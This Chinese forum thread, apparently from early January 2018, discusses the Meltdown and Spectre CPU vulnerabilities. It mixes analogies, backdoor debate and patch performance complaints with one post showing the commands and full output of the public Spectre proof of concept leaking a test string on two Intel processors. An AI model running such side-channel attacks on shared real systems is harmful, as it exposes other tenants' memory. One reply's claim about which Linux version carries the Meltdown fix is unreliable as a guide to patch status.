x86 CPU bug 更详细的技术细节流出

我试图向我爸妈一辈的人解释这个事情，这两个 BUG 可以像下面这样形容吗？
如果把数据比作钱，存储数据的空间比喻成银行
利用 Meltdown，可以让黑客偷去银行里面属于央行的钱。
利用 Spectre，可以让黑客偷取别人账户的钱。

@jaleo 这和是不是自主可控没关系，自主可控一样可能有大 bug，人发现了根本就不告诉你

@VYSE linux 上实测带有 invariant tsc 的新处理器全中招，老的 core2 在__rdtscp 处非法指令，换成 rdtsc 能跑过，但基本不中招。牙膏厂只要弄个开关把 tsc 弄得模糊点应该可以应付过去 spectre 攻击。

新赛扬，core i：
# /tmp/spectre-attack
Putting 'The Magic Words are Squeamish Ossifrage.' in memory
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfeb98... Success: 0x54=’ T ’ score=17 (second best: 0x05 score=6)
Reading at malicious_x = 0xffffffffffdfeb99... Success: 0x68=’ h ’ score=17 (second best: 0x05 score=6)
Reading at malicious_x = 0xffffffffffdfeb9a... Success: 0x65=’ e ’ score=2
Reading at malicious_x = 0xffffffffffdfeb9b... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfeb9c... Success: 0x4D=’ M ’ score=2
Reading at malicious_x = 0xffffffffffdfeb9d... Success: 0x61=’ a ’ score=19 (second best: 0x00 score=6)
Reading at malicious_x = 0xffffffffffdfeb9e... Success: 0x67=’ g ’ score=2
Reading at malicious_x = 0xffffffffffdfeb9f... Success: 0x69=’ i ’ score=2
Reading at malicious_x = 0xffffffffffdfeba0... Success: 0x63=’ c ’ score=125 (second best: 0x00 score=61)
Reading at malicious_x = 0xffffffffffdfeba1... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfeba2... Success: 0x57=’ W ’ score=2
Reading at malicious_x = 0xffffffffffdfeba3... Success: 0x6F=’ o ’ score=2
Reading at malicious_x = 0xffffffffffdfeba4... Success: 0x72=’ r ’ score=2
Reading at malicious_x = 0xffffffffffdfeba5... Success: 0x64=’ d ’ score=2
Reading at malicious_x = 0xffffffffffdfeba6... Success: 0x73=’ s ’ score=2
Reading at malicious_x = 0xffffffffffdfeba7... Success: 0x20=’ ’ score=97 (second best: 0x05 score=46)
Reading at malicious_x = 0xffffffffffdfeba8... Success: 0x61=’ a ’ score=2
Reading at malicious_x = 0xffffffffffdfeba9... Success: 0x72=’ r ’ score=2
Reading at malicious_x = 0xffffffffffdfebaa... Success: 0x65=’ e ’ score=107 (second best: 0x00 score=50)
Reading at malicious_x = 0xffffffffffdfebab... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfebac... Success: 0x53=’ S ’ score=2
Reading at malicious_x = 0xffffffffffdfebad... Success: 0x71=’ q ’ score=2
Reading at malicious_x = 0xffffffffffdfebae... Success: 0x75=’ u ’ score=2
Reading at malicious_x = 0xffffffffffdfebaf... Success: 0x65=’ e ’ score=2
Reading at malicious_x = 0xffffffffffdfebb0... Success: 0x61=’ a ’ score=513 (second best: 0x00 score=255)
Reading at malicious_x = 0xffffffffffdfebb1... Success: 0x6D=’ m ’ score=2
Reading at malicious_x = 0xffffffffffdfebb2... Success: 0x69=’ i ’ score=2
Reading at malicious_x = 0xffffffffffdfebb3... Success: 0x73=’ s ’ score=2
Reading at malicious_x = 0xffffffffffdfebb4... Success: 0x68=’ h ’ score=13 (second best: 0x00 score=5)
Reading at malicious_x = 0xffffffffffdfebb5... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfebb6... Success: 0x4F=’ O ’ score=17 (second best: 0x00 score=7)
Reading at malicious_x = 0xffffffffffdfebb7... Success: 0x73=’ s ’ score=2
Reading at malicious_x = 0xffffffffffdfebb8... Success: 0x73=’ s ’ score=2
Reading at malicious_x = 0xffffffffffdfebb9... Success: 0x69=’ i ’ score=93 (second best: 0x00 score=45)
Reading at malicious_x = 0xffffffffffdfebba... Success: 0x66=’ f ’ score=2
Reading at malicious_x = 0xffffffffffdfebbb... Success: 0x72=’ r ’ score=2
Reading at malicious_x = 0xffffffffffdfebbc... Success: 0x61=’ a ’ score=2
Reading at malicious_x = 0xffffffffffdfebbd... Success: 0x67=’ g ’ score=2
Reading at malicious_x = 0xffffffffffdfebbe... Success: 0x65=’ e ’ score=2
Reading at malicious_x = 0xffffffffffdfebbf... Success: 0x2E=’.’ score=251 (second best: 0x00 score=122)

老 core2，每次结果不一样，因为 tsc 不准，这是猜对最多的一次：
#./spectre-attack 10
Putting 'The Magic Words are Squeamish Ossifrage.' in memory
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfeb78... Success: 0x54=’ T ’ score=2
Reading at malicious_x = 0xffffffffffdfeb79... Success: 0x68=’ h ’ score=2
Reading at malicious_x = 0xffffffffffdfeb7a... Success: 0x65=’ e ’ score=6
Reading at malicious_x = 0xffffffffffdfeb7b... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfeb7c... Success: 0x4D=’ M ’ score=1
Reading at malicious_x = 0xffffffffffdfeb7d... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb7e... Success: 0x67=’ g ’ score=1
Reading at malicious_x = 0xffffffffffdfeb7f... Success: 0x69=’ i ’ score=1
Reading at malicious_x = 0xffffffffffdfeb80... Success: 0x63=’ c ’ score=2
Reading at malicious_x = 0xffffffffffdfeb81... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb82... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb83... Success: 0x6F=’ o ’ score=1
Reading at malicious_x = 0xffffffffffdfeb84... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb85... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb86... Success: 0x73=’ s ’ score=2
Reading at malicious_x = 0xffffffffffdfeb87... Success: 0x66=’ f ’ score=1
Reading at malicious_x = 0xffffffffffdfeb88... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb89... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb8a... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb8b... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb8c... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb8d... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb8e... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb8f... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb90... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb91... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb92... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb93... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb94... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb95... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb96... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb97... Success: 0x73=’ s ’ score=2
Reading at malicious_x = 0xffffffffffdfeb98... Success: 0x00=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb99... Success: 0x69=’ i ’ score=2
Reading at malicious_x = 0xffffffffffdfeb9a... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb9b... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb9c... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb9d... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb9e... Success: 0x65=’ e ’ score=1
Reading at malicious_x = 0xffffffffffdfeb9f... Success: 0xFF=’?’ score=0

@hippies 被发现了叫漏洞，没发现叫后门。天知道 CIA 用这个干了多少事。
这就是为什么需要自主可控芯片的原因

@jaleo 自主可控就不需要后门了，直接前门

@jaleo 天知道这个后门也帮了我国多大的忙，就这样给搅和了，哭

看 linus 的回复真带感.

"Maybe even a L1 I$ that is keyed by CPL." 这个没看懂

lkml.org 的 G+ 分享数挂了..

@bigphat 简单点 你买的新房子 用你家钥匙可以开整栋楼的门。。。 解决方案 安装防盗门。 后果导致回家开门的时候要多开一道门耽误了进门时间

打完补丁 VM 性能下降严重（写入掉了一半，读取掉了三分之一，仅 VM 环境）……
简直是 fuck intel ……

Intel 至少得怎么补偿下客户吧，否则太不爽了。

我想知道骁龙 845 有没有被波及，哈哈哈哈哈哈，想想都想笑。。

第一句话翻译错了，你自己再读读看……

谁能用通俗的话给我解释一下，这个"BUG “不打补丁修复的话，可能会在什么场景下遇到什么问题？

@cppgohan dollar=cash=cache,
I=instruction
Linus 的意思是 cpu 内建一个按 cpl 分桶的指令缓存，哪怕用这么土的方法达到前面一句话的 make sure...也行啊，都按 cpl 分开了肯定不能跨特权级了嘛……鬼知道人家硬件工程师是不是受限于成本才不这么干呢

@stabc #73

https://twitter.com/twitter/statuses/948706387491786752

@fline 如果你有看卤煮发的全部内容，就该知道 845 也受影响

不知道如果 vps 的 host 打了补丁，VM 没打补丁的话，能否读取其他 VM 的数据

所以到底哪个型号的 CPU 受影响？或者哪个型号的不受影响？

怎么知道系统打了修正这几个问题的补丁？ 包括 Windows 和 Linux 系统。
普通用户只有任人宰割了

@kaneg Linux 的话 4.13.11 后的版本是有 Meltdown 的补丁的。

Spectre 无通用补丁。